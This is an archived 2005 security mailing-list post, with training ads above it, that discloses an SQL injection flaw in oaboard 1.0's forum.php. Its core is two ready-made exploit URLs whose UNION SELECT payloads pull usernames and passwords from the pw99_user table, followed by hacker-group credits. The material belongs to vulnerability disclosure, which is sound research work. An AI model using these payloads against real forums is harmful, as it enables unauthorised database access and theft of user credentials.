Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | SQL IN FORUM.PHP |
|---|---|
| Date: | 30 Oct 2005 12:03:59 -0000 |
Class: Input Validation Error
CVE: CVE-MAP-NOMATCH
Remote: Yes
Discovered BY ABDUCTER & Expliot BY DEVIL-00
ABDUCTER_MINDS@S4A.CC (OR) ABDUCTER_MINDS@YAHOO.COM
Vulnerable:powered by oaboard 1.0
//////////////////////////////////
info:- FOR INFORMATION VISIT http://oaboard.myserver.at/oaboard/forum.php
/////////////////////////////////
discussion: THERE IS SQL IN FORUM.PHP
*********************************
EXPLIOTS AND EXAMPLE
--------------------
//-------1---------//
http://WWW.VICTIM.COM/oaboard/forum.php?modul=topics&channel=[SQL]
http://WWW.VICTIM.COM/oaboard/forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1
//-------2--------//
http://WWW.VICTIM.COM/oaboard/forum.php?modul=posting&topic=[SQL]&channel=3
http://oWWW.VICTIM.COM/oaboard/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3
*********************************
CREDITS S4A.CC FOR ALL GEEKS
FOR AL ARAB
HACKER PAL
MY LOVE (N0N0)
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | mwcollect v3.0.0 Release, Georg Wicherski |
|---|---|
| Next by Date: | Re: uplod phpshell in PHP Advanced Transfer Manager, D_BuG |
| Previous by Thread: | mwcollect v3.0.0 Release, Georg Wicherski |
| Next by Thread: | APPLE-SA-2005-10-31 Mac OS X v10.4.3, noreply |
| Indexes: | [Date] [Thread] [Top] [All Lists] |